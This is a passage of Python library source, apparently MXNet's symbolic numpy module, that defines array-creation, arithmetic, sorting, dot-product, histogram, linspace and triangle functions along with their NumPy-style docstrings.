float64. Note that this behavior is different from NumPy's `ones` function where `float64` is the default value. order : {'C'}, optional, default: 'C' How to store multi-dimensional data in memory, currently only row-major (C-style) is supported. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol Array of ones with the given shape, dtype, and ctx. """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() return _npi.ones(shape=shape, ctx=ctx, dtype=dtype) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def invert(x, out=None, **kwargs): r""" Compute bit-wise inversion, or bit-wise NOT, element-wise. Computes the bit-wise NOT of the underlying binary representation of the integers in the input arrays. This ufunc implements the C/Python operator ``~``. Parameters ---------- x : array_like Only integer and boolean types are handled. out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- out : ndarray or scalar Result. This is a scalar if `x` is a scalar. See Also -------- bitwise_and, bitwise_or, bitwise_xor logical_not binary_repr : Return the binary representation of the input number as a string. Examples -------- We've seen that 13 is represented by ``00001101``. The invert or bit-wise NOT of 13 is then: >>> x = np.invert(np.array(13, dtype=np.uint8)) >>> x 242 >>> np.binary_repr(x, width=8) '11110010' Notes ----- `bitwise_not` is an alias for `invert`: >>> np.bitwise_not is np.invert True """ return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs) @set_module('mxnet.symbol.numpy') @wrap_np_unary_func def bitwise_not(x, out=None, **kwargs): r""" Compute bit-wise inversion, or bit-wise NOT, element-wise. Computes the bit-wise NOT of the underlying binary representation of the integers in the input arrays. This ufunc implements the C/Python operator ``~``. Parameters ---------- x : array_like Only integer and boolean types are handled. out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- out : ndarray or scalar Result. This is a scalar if `x` is a scalar. See Also -------- bitwise_and, bitwise_or, bitwise_xor logical_not binary_repr : Return the binary representation of the input number as a string. Examples -------- We've seen that 13 is represented by ``00001101``. The invert or bit-wise NOT of 13 is then: >>> x = np.invert(np.array(13, dtype=np.uint8)) >>> x 242 >>> np.binary_repr(x, width=8) '11110010' Notes ----- `bitwise_not` is an alias for `invert`: >>> np.bitwise_not is np.invert True """ return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs) @set_module('mxnet.symbol.numpy') def broadcast_to(array, shape): """ Broadcast an array to a new shape. Parameters ---------- array : _Symbol or scalar The array to broadcast. shape : tuple The shape of the desired array. Returns ------- broadcast : array A readonly view on the original array with the given shape. It is typically not contiguous. Furthermore, more than one element of a broadcasted array may refer to a single memory location. Raises ------ MXNetError If the array is not compatible with the new shape according to NumPy's broadcasting rules. """ if _np.isscalar(array): return full(shape, array) return _npi.broadcast_to(array, shape) @set_module('mxnet.symbol.numpy') def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments """ Return a new array of given shape and type, filled with `fill_value`. Parameters ---------- shape : int or sequence of ints Shape of the new array, e.g., ``(2, 3)`` or ``2``. fill_value : scalar or _Symbol Fill value. dtype : data-type, optional When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. The desired data-type for the array. The default, `None`, means `np.array(fill_value).dtype`. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. ctx: to specify the device, e.g. the i-th GPU. out : ndarray or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : ndarray Array of `fill_value` with the given shape, dtype, and order. Notes ----- This function differs from the original `numpy.full https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html`_ in the following way(s): - Have an additional `ctx` argument to specify the device - Have an additional `out` argument - Currently does not support `order` selection See Also -------- empty : Return a new uninitialized array. ones : Return a new array setting values to one. zeros : Return a new array setting values to zero. Examples -------- >>> np.full((2, 2), 10) array([[10., 10.], [10., 10.]]) >>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0)) array([[2, 2], [2, 2]], dtype=int32) """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() if isinstance(fill_value, Symbol): if dtype is None: ret = broadcast_to(fill_value, shape) else: ret = broadcast_to(fill_value, shape).astype(dtype) return ret if isinstance(fill_value, bool): fill_value = int(fill_value) dtype = _np.bool if dtype is None else dtype return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments """ Return a full array with the same shape and type as a given array. Parameters ---------- a : _Symbol The shape and data-type of `a` define these same attributes of the returned array. fill_value : scalar Fill value. dtype : data-type, optional Overrides the data type of the result. Temporarily do not support boolean type. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. ctx: to specify the device, e.g. the i-th GPU. out : ndarray or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol Array `fill_value` with the same shape and type as `a`. See Also -------- empty_like : Return an empty array with shape and type of input. ones_like : Return an array of ones with shape and type of input. zeros_like : Return an array of zeros with shape and type of input. full : Return a new array of given shape filled with value. """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() if isinstance(fill_value, bool): fill_value = int(fill_value) return _npi.full_like(a, fill_value=fill_value, ctx=ctx, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def zeros_like(a, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments """ Return an array of zeros with the same shape and type as a given array. Parameters ---------- a : _Symbol The shape and data-type of `a` define these same attributes of the returned array. fill_value : scalar Fill value. dtype : data-type, optional Overrides the data type of the result. Temporarily do not support boolean type. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. ctx: to specify the device, e.g. the i-th GPU. out : ndarray or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol Array of zeros with the same shape and type as `a`. See Also -------- empty_like : Return an empty array with shape and type of input. ones_like : Return an array of ones with shape and type of input. zeros_like : Return an array of zeros with shape and type of input. zeros : Return a new array of given shape filled with zeros. """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() return _npi.full_like(a, fill_value=0, ctx=ctx, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def ones_like(a, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments """ Return an array of ones with the same shape and type as a given array. Parameters ---------- a : _Symbol The shape and data-type of `a` define these same attributes of the returned array. fill_value : scalar Fill value. dtype : data-type, optional Overrides the data type of the result. Temporarily do not support boolean type. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. ctx: to specify the device, e.g. the i-th GPU. out : ndarray or None, optional A location into which the result is stored. If provided, it must have the same shape and dtype as input ndarray. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol Array of ones with the same shape and type as `a`. See Also -------- empty_like : Return an empty array with shape and type of input. ones_like : Return an array of ones with shape and type of input. zeros_like : Return an array of zeros with shape and type of input. zeros : Return a new array of given shape filled with zeros. """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() return _npi.full_like(a, fill_value=1, ctx=ctx, dtype=dtype, out=out) @set_module('mxnet.symbol.numpy') def identity(n, dtype=None, ctx=None): """ Return the identity array. The identity array is a square array with ones on the main diagonal. Parameters ---------- n : int Number of rows (and columns) in `n` x `n` output. dtype : data-type, optional Data-type of the output. When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol `n` x `n` array with its main diagonal set to one, and all other elements 0. """ if not isinstance(n, int): raise TypeError("Input 'n' should be an integer") if n < 0: raise ValueError("Input 'n' cannot be negative") if ctx is None: ctx = current_context() return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def take(a, indices, axis=None, mode='raise', out=None): r""" Take elements from an array along an axis. When axis is not None, this function does the same thing as "fancy" indexing (indexing arrays using arrays); however, it can be easier to use if you need elements along a given axis. A call such as ``np.take(arr, indices, axis=3)`` is equivalent to ``arr[:,:,:,indices,...]``. Explained without fancy indexing, this is equivalent to the following use of `ndindex`, which sets each of ``ii``, ``jj``, and ``kk`` to a tuple of indices:: Ni, Nk = a.shape[:axis], a.shape[axis+1:] Nj = indices.shape for ii in ndindex(Ni): for jj in ndindex(Nj): for kk in ndindex(Nk): out[ii + jj + kk] = a[ii + (indices[jj],) + kk] Parameters ---------- a : _Symbol The source array. indices : _Symbol The indices of the values to extract. Also allow scalars for indices. axis : int, optional The axis over which to select values. By default, the flattened input array is used. out : _Symbol or None, optional Dummy parameter to keep the consistency with the ndarray counterpart. mode : {'clip', 'wrap'}, optional Specifies how out-of-bounds indices will behave. * 'clip' -- clip to the range (default) * 'wrap' -- wrap around 'clip' mode means that all indices that are too large are replaced by the index that addresses the last element along that axis. Note that this disables indexing with negative numbers. Returns ------- out : _Symbol The returned array has the same type as `a`. Notes ----- This function differs from the original `numpy.take <https://docs.scipy.org/doc/numpy/reference/generated/numpy.take.html>`_ in the following way(s): - Only ndarray or scalar ndarray is accepted as valid input. """ if mode not in ('wrap', 'clip', 'raise'): raise NotImplementedError( "function take does not support mode '{}'".format(mode)) if axis is None: return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out) else: return _npi.take(a, indices, axis, mode, out) # pylint: enable=redefined-outer-name #pylint: disable= too-many-arguments, no-member, protected-access def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None): """ Helper function for element-wise operation. The function will perform numpy-like broadcasting if needed and call different functions. Parameters -------- lhs : Symbol or numeric value Left-hand side operand. rhs : Symbol or numeric value Right-hand operand, fn_array : function Function to be called if both lhs and rhs are of ``Symbol`` type. fn_scalar : function Function to be called if both lhs and rhs are numeric values. lfn_scalar : function Function to be called if lhs is ``Symbol`` while rhs is numeric value rfn_scalar : function Function to be called if lhs is numeric value while rhs is ``Symbol``; if none is provided, then the function is commutative, so rfn_scalar is equal to lfn_scalar Returns -------- mxnet.numpy.ndarray result array """ if isinstance(lhs, numeric_types): if isinstance(rhs, numeric_types): return fn_scalar(lhs, rhs, out=out) else: is_int = isinstance(rhs, integer_types) if rfn_scalar is None: # commutative function return lfn_scalar(rhs, scalar=float(lhs), is_int=is_int, out=out) else: return rfn_scalar(rhs, scalar=float(lhs), is_int=is_int, out=out) elif isinstance(rhs, numeric_types): is_int = isinstance(rhs, integer_types) return lfn_scalar(lhs, scalar=float(rhs), is_int=is_int, out=out) elif isinstance(rhs, Symbol): return fn_array(lhs, rhs, out=out) else: raise TypeError('type %s not supported' % str(type(rhs))) #pylint: enable= too-many-arguments, no-member, protected-access @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def add(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def subtract(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract, _npi.subtract_scalar, _npi.rsubtract_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def multiply(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply, _npi.multiply_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def divide(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar, _npi.rtrue_divide_scalar, out) @set_module('mxnet.symbol.numpy') def true_divide(x1, x2, out=None): return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar, _npi.rtrue_divide_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def mod(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def fmod(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.fmod, _np.fmod, _npi.fmod_scalar, _npi.rfmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def remainder(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def power(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar, _npi.rpower_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def gcd(x1, x2, out=None, **kwargs): """ Returns the greatest common divisor of ``|x1|`` and ``|x2|`` Parameters ---------- x1, x2 : ndarrays or scalar values The arrays for computing greatest common divisor. If x1.shape != x2.shape, they must be broadcastable to a common shape (which may be the shape of one or the other). out : ndarray or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. Returns ------- y : ndarray or scalar The greatest common divisor of the absolute value of the inputs This is a scalar if both `x1` and `x2` are scalars. See Also -------- lcm : The lowest common multiple """ return _ufunc_helper(x1, x2, _npi.gcd, _np.gcd, _npi.gcd_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def matmul(a, b, out=None, **kwargs): """ Matrix product of two arrays. Parameters ---------- a, b : _Symbol. out : _Symbol, optional A location into which the result is stored. If provided, it must have a shape that matches the signature (n,k),(k,m)->(n,m). If not provided or None, a freshly-allocated array is returned. Returns ------- y : _Symbol The matrix product of the inputs. This is a scalar only when both x1, x2 are 1-d vectors. Raises ------ MXNetError If the last dimension of a is not the same size as the second-to-last dimension of b. If a scalar value is passed in. See Also -------- tensordot : Sum products over arbitrary axes. dot : alternative matrix product with different broadcasting rules. einsum : Einstein summation convention. Notes ----- The behavior depends on the arguments in the following way. - If both arguments are 2-D they are multiplied like conventional matrices. - If either argument is N-D, N > 2, it is treated as a stack of matrices residing in the last two indexes and broadcast accordingly. - If the first argument is 1-D, it is promoted to a matrix by prepending a 1 to its dimensions. After matrix multiplication the prepended 1 is removed. - If the second argument is 1-D, it is promoted to a matrix by appending a 1 to its dimensions. After matrix multiplication the appended 1 is removed. matmul differs from dot in two important ways: - Multiplication by scalars is not allowed, use multiply instead. - Stacks of matrices are broadcast together as if the matrices were elements, respecting the signature (n,k),(k,m)->(n,m). """ return _npi.matmul(a, b, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def lcm(x1, x2, out=None, **kwargs): """ Returns the lowest common multiple of ``|x1|`` and ``|x2|`` Parameters ---------- x1, x2 : _Symbols or scalar values The arrays for computing lowest common multiple. If x1.shape != x2.shape, they must be broadcastable to a common shape (which may be the shape of one or the other). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. Returns ------- y : _Symbol or scalar The lowest common multiple of the absolute value of the inputs This is a scalar if both `x1` and `x2` are scalars. See Also -------- gcd : The greatest common divisor """ return _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out) @set_module('mxnet.symbol.numpy') def argsort(a, axis=-1, kind=None, order=None): """ Returns the indices that would sort an array. Perform an indirect sort along the given axis using the algorithm specified by the `kind` keyword. It returns an array of indices of the same shape as `a` that index data along the given axis in sorted order. Parameters ---------- a : _Symbol Array to sort. axis : int or None, optional Axis along which to sort. The default is -1 (the last axis). If None, the flattened array is used. kind : string, optional This argument can take any string, but it does not have any effect on the final result. order : str or list of str, optional Not supported yet, will raise NotImplementedError if not None. Returns ------- index_array : _Symbol, int Array of indices that sort `a` along the specified `axis`. If `a` is one-dimensional, ``a[index_array]`` yields a sorted `a`. More generally, ``np.take_along_axis(a, index_array, axis=axis)`` always yields the sorted `a`, irrespective of dimensionality. Notes ----- This operator does not support different sorting algorithms. """ if order is not None: raise NotImplementedError("order is not supported yet...") return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64') @set_module('mxnet.symbol.numpy') def sort(a, axis=-1, kind=None, order=None): """ Return a sorted copy of an array. Parameters ---------- a : _Symbol Array to be sorted. axis : int or None, optional Axis along which to sort. The default is -1 (the last axis). If None, the flattened array is used. kind : string, optional This argument can take any string, but it does not have any effect on the final result. order : str or list of str, optional Not supported yet, will raise NotImplementedError if not None. Returns ------- sorted_array : ndarray Array of the same type and shape as `a`. Notes ----- This operator does not support different sorting algorithms. """ if order is not None: raise NotImplementedError("order is not supported yet...") return _npi.sort(data=a, axis=axis, is_ascend=True) @set_module('mxnet.symbol.numpy') def dot(a, b, out=None): """ Dot product of two arrays. Specifically, - If both `a` and `b` are 1-D arrays, it is inner product of vectors - If both `a` and `b` are 2-D arrays, it is matrix multiplication, - If either `a` or `b` is 0-D (scalar), it is equivalent to :func:`multiply` and using ``np.multiply(a, b)`` or ``a * b`` is preferred. - If `a` is an N-D array and `b` is a 1-D array, it is a sum product over the last axis of `a` and `b`. - If `a` is an N-D array and `b` is a 2-D array, it is a sum product over the last axis of `a` and the second-to-last axis of `b`:: dot(a, b)[i,j,k] = sum(a[i,j,:] * b[:,k]) Parameters ---------- a : _Symbol First argument. b : _Symbol Second argument. out : _Symbol, optional Output argument. It must have the same shape and type as the expected output. Returns ------- output : _Symbol Returns the dot product of `a` and `b`. If `a` and `b` are both scalars or both 1-D arrays then a scalar is returned; otherwise an array is returned. If `out` is given, then it is returned Examples -------- >>> a = np.array(3) >>> b = np.array(4) >>> np.dot(a, b) array(12.) For 2-D arrays it is the matrix product: >>> a = np.array([[1, 0], [0, 1]]) >>> b = np.array([[4, 1], [2, 2]]) >>> np.dot(a, b) array([[4., 1.], [2., 2.]]) >>> a = np.arange(3*4*5*6).reshape((3,4,5,6)) >>> b = np.arange(5*6)[::-1].reshape((6,5)) >>> np.dot(a, b)[2,3,2,2] array(29884.) >>> np.sum(a[2,3,2,:] * b[:,2]) array(29884.) """ return _npi.dot(a, b, out=out) @set_module('mxnet.symbol.numpy') def tensordot(a, b, axes=2): r""" tensordot(a, b, axes=2) Compute tensor dot product along specified axes for arrays >= 1-D. Given two tensors (arrays of dimension greater than or equal to one), `a` and `b`, and an ndarray object containing two ndarray objects, ``(a_axes, b_axes)``, sum the products of `a`'s and `b`'s elements (components) over the axes specified by ``a_axes`` and ``b_axes``. The third argument can be a single non-negative integer_like scalar, ``N``; if it is such, then the last ``N`` dimensions of `a` and the first ``N`` dimensions of `b` are summed over. Parameters ---------- a, b : _Symbol Tensors to "dot". axes : int or (2,) ndarray * integer_like If an int N, sum over the last N axes of `a` and the first N axes of `b` in order. The sizes of the corresponding axes must match. * (2,) array_like Or, a list of axes to be summed over, first sequence applying to `a`, second to `b`. Both elements array_like must be of the same length. Notes ----- Three common use cases are: * ``axes = 0`` : tensor product :math:`a\otimes b` * ``axes = 1`` : tensor dot product :math:`a\cdot b` * ``axes = 2`` : (default) tensor double contraction :math:`a:b` When `axes` is integer_like, the sequence for evaluation will be: first the -Nth axis in `a` and 0th axis in `b`, and the -1th axis in `a` and Nth axis in `b` last. When there is more than one axis to sum over - and they are not the last (first) axes of `a` (`b`) - the argument `axes` should consist of two sequences of the same length, with the first axis to sum over given first in both sequences, the second axis second, and so forth. """ if _np.isscalar(axes): return _npi.tensordot_int_axes(a, b, axes) if len(axes) != 2: raise ValueError('Axes must consist of two arrays.') a_axes_summed, b_axes_summed = axes if _np.isscalar(a_axes_summed): a_axes_summed = (a_axes_summed,) if _np.isscalar(b_axes_summed): b_axes_summed = (b_axes_summed,) if len(a_axes_summed) != len(b_axes_summed): raise ValueError('Axes length mismatch') return _npi.tensordot(a, b, a_axes_summed, b_axes_summed) @set_module('mxnet.symbol.numpy') def histogram(a, bins=10, range=None, normed=None, weights=None, density=None): # pylint: disable= too-many-arguments """ Compute the histogram of a set of data. Parameters ---------- a : Symbol Input data. The histogram is computed over the flattened array. bins : int or Symbol If `bins` is an int, it defines the number of equal-width bins in the given range (10, by default). If `bins` is a sequence, it defines a monotonically increasing array of bin edges, including the rightmost edge, allowing for non-uniform bin widths. .. versionadded:: 1.11.0 If `bins` is a string, it defines the method used to calculate the optimal bin width, as defined by `histogram_bin_edges`. range : (float, float) The lower and upper range of the bins. Required when `bins` is an integer. Values outside the range are ignored. The first element of the range must be less than or equal to the second. normed : bool, optional Not supported yet, coming soon. weights : array_like, optional Not supported yet, coming soon. density : bool, optional Not supported yet, coming soon. """ if normed is True: raise NotImplementedError("normed is not supported yet...") if weights is not None: raise NotImplementedError("weights is not supported yet...") if density is True: raise NotImplementedError("density is not supported yet...") if isinstance(bins, numeric_types): if range is None: raise NotImplementedError("automatic range is not avaialble yet...") return _npi.histogram(a, bin_cnt=bins, range=range) if isinstance(bins, (list, tuple)): raise NotImplementedError("array_like bins is not supported yet...") if isinstance(bins, str): raise NotImplementedError("string bins is not supported yet...") if isinstance(bins, Symbol): return _npi.histogram(a, bins) raise ValueError("histogram fails with", locals()) @set_module('mxnet.symbol.numpy') def eye(N, M=None, k=0, dtype=float, **kwargs): """ Return a 2-D array with ones on the diagonal and zeros elsewhere. Parameters ---------- N : int Number of rows in the output. M : int, optional Number of columns in the output. If None, defaults to N. k : int, optional Index of the diagonal: 0 (the default) refers to the main diagonal, a positive value refers to an upper diagonal, and a negative value to a lower diagonal. dtype : data-type, optional Data-type of the returned array. When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Returns ------- I : _Symbol of shape (N,M) An array where all elements are equal to zero, except for the k-th diagonal, whose values are equal to one. """ _sanity_check_params('eye', ['order'], kwargs) ctx = kwargs.pop('ctx', current_context()) if ctx is None: ctx = current_context() if dtype is None or dtype is float: dtype = _np.float64 if is_np_default_dtype() else _np.float32 return _npi.eye(N, M, k, ctx, dtype) @set_module('mxnet.symbol.numpy') def empty_like(prototype, dtype=None, order='C', subok=False, shape=None): # pylint: disable=W0621 """ Return a new array with the same shape and type as a given array. Parameters ---------- prototype : _Symbol The shape and data-type of `prototype` define these same attributes of the returned array. dtype : data-type, optional Overrides the data type of the result. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. subok : bool, optional. If True, then the newly created array will use the sub-class type of 'a', otherwise it will be a base-class array. Defaults to False. (Only support False at this moment) shape : int or sequence of ints, optional. Overrides the shape of the result. If order='K' and the number of dimensions is unchanged, will try to keep order, otherwise, order='C' is implied. (This parameter is not supported at this moment) Returns ------- out : _Symbol Array of uninitialized (arbitrary) data with the same shape and type as `prototype`. See Also -------- ones_like : Return an array of ones with shape and type of input. zeros_like : Return an array of zeros with shape and type of input. full_like : Return a new array with shape of input filled with value. empty : Return a new uninitialized array. Notes ----- This function does *not* initialize the returned array; to do that use `zeros_like` or `ones_like` instead. It may be marginally faster than the functions that do set the array values. """ dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32', _np.int64:'int64', _np.float16:'float16', _np.float32:'float32', _np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'} if order != 'C': raise NotImplementedError("Only support C order at this moment") if subok: raise NotImplementedError("Creating array by using sub-class is not supported at this moment") if shape is not None: raise NotImplementedError("Parameter 'shape' is not supported at this moment") try: dtype = dtype if isinstance(dtype, str) else dtype_list[dtype] except: raise NotImplementedError("Do not support this dtype at this moment") return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape) @set_module('mxnet.symbol.numpy') def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments r""" Return evenly spaced numbers over a specified interval. Returns num evenly spaced samples, calculated over the interval [start, stop]. The endpoint of the interval can optionally be excluded. Parameters ---------- start : real number The starting value of the sequence. stop : real number The end value of the sequence, unless endpoint is set to False. In that case, the sequence consists of all but the last of num + 1 evenly spaced samples, so that stop is excluded. Note that the step size changes when endpoint is False. num : int, optional Number of samples to generate. Default is 50. Must be non-negative. endpoint : bool, optional If True, stop is the last sample. Otherwise, it is not included. Default is True. retstep : bool, optional If True, return (samples, step), where step is the spacing between samples. dtype : dtype, optional The type of the output array. If dtype is not given, infer the data type from the other input arguments. axis : int, optional The axis in the result to store the samples. Relevant only if start or stop are array-like. By default (0), the samples will be along a new axis inserted at the beginning. Use -1 to get an axis at the end. Returns ------- samples : _Symbol There are num equally spaced samples in the closed interval `[start, stop]` or the half-open interval `[start, stop)` (depending on whether endpoint is True or False). step : float, optional Only returned if retstep is True Size of spacing between samples. See Also -------- arange : Similar to `linspace`, but uses a step size (instead of the number of samples). Notes ----- This function differs from the original `numpy.linspace <https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in the following aspects: - `start` and `stop` do not support list, numpy ndarray and mxnet ndarray - axis could only be 0 - There could be an additional `ctx` argument to specify the device, e.g. the i-th GPU. """ if isinstance(start, (list, _np.ndarray)) or isinstance(stop, (list, _np.ndarray)): raise NotImplementedError('start and stop only support int') if axis != 0: raise NotImplementedError("the function only support axis 0") if ctx is None: ctx = current_context() if retstep: step = (stop - start) / (num - 1) return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype), step else: return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype) @set_module('mxnet.symbol.numpy') def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments r"""Return numbers spaced evenly on a log scale. In linear space, the sequence starts at ``base ** start`` (`base` to the power of `start`) and ends with ``base ** stop`` (see `endpoint` below). Non-scalar `start` and `stop` are now supported. Parameters ---------- start : scalar ``base ** start`` is the starting value of the sequence. stop : scalar ``base ** stop`` is the final value of the sequence, unless `endpoint` is False. In that case, ``num + 1`` values are spaced over the interval in log-space, of which all but the last (a sequence of length `num`) are returned. num : scalar, optional Number of samples to generate. Default is 50. endpoint : boolean, optional If true, `stop` is the last sample. Otherwise, it is not included. Default is True. base : scalar, optional The base of the log space. The step size between the elements in ``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform. Default is 10.0. dtype : dtype The type of the output array. If `dtype` is not given, infer the data type from the other input arguments. axis : scalar, optional The axis in the result to store the samples. Relevant only if start or stop are array-like. By default (0), the samples will be along a new axis inserted at the beginning. Now, axis only support axis = 0. ctx : Context, optional An optional device context (default is the current default context). Returns ------- samples : _Symbol `num` samples, equally spaced on a log scale. See Also -------- arange : Similar to linspace, with the step size specified instead of the number of samples. Note that, when used with a float endpoint, the endpoint may or may not be included. linspace : Similar to logspace, but with the samples uniformly distributed in linear space, instead of log space. Notes ----- Logspace is equivalent to the code >>> y = np.linspace(start, stop, num=num, endpoint=endpoint) ... >>> power(base, y).astype(dtype) ... Examples -------- >>> np.logspace(2.0, 3.0, num=4) array([ 100. , 215.44347, 464.15887, 1000. ]) >>> np.logspace(2.0, 3.0, num=4, endpoint=False) array([100. , 177.82794, 316.22775, 562.3413 ]) >>> np.logspace(2.0, 3.0, num=4, base=2.0) array([4. , 5.0396843, 6.349604 , 8. ]) >>> np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.int32) array([4, 5, 6, 8], dtype=int32) >>> np.logspace(2.0, 3.0, num=4, ctx=npx.gpu(0)) array([ 100. , 215.44347, 464.15887, 1000. ], ctx=gpu(0)) """ if isinstance(start, (list, _np.ndarray)) or \ isinstance(stop, (list, _np.ndarray)): raise NotImplementedError('start and stop only support int') if axis != 0: raise NotImplementedError("the function only support axis 0") if ctx is None: ctx = current_context() return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype) @set_module('mxnet.symbol.numpy') def expand_dims(a, axis): """Expand the shape of an array. Insert a new axis that will appear at the `axis` position in the expanded Parameters ---------- a : _Symbol Input array. axis : int Position in the expanded axes where the new axis is placed. Returns ------- res : _Symbol Output array. The number of dimensions is one greater than that of the input array. """ return _npi.expand_dims(a, axis) @set_module('mxnet.symbol.numpy') def tril(m, k=0): r""" Lower triangle of an array. Return a copy of an array with elements above the `k`-th diagonal zeroed. Parameters ---------- m : _Symbol, shape (M, N) Input array. k : int, optional Diagonal above which to zero elements. `k = 0` (the default) is the main diagonal, `k < 0` is below it and `k > 0` is above. Returns ------- tril : _Symbol, shape (M, N) Lower triangle of `m`, of same shape and data-type as `m`. See Also -------- triu : same thing, only for the upper triangle """ return _npi.tril(m, k) @set_module('mxnet.symbol.numpy') def triu(m, k=0): r""" Upper triangle of an array. Return a copy of an array with elements under the `k`-th diagonal zeroed. Parameters ---------- m : _Symbol, shape (M, N) Input array. k : int, optional Diagonal under which to zero elements. `k = 0` (the default) is the main diagonal, `k < 0` is below it and `k > 0` is under. Returns ------- triu : _Symbol, shape (M, N) Upper triangle of `m`, of same shape and data-type as `m`. See Also -------- tril : same thing, only for the lower triangle """ return _npi.triu(m, k) def tril_indices(n, k=0, m=None): """ Return the indices for the lower-triangle of an (n, m) array. Parameters ---------- n : int The row dimension of the arrays for which the returned indices will be valid. k : int, optional Diagonal offset (see `tril` for details). m : int, optional .. versionadded:: 1.9.0 The column dimension of the arrays for which the 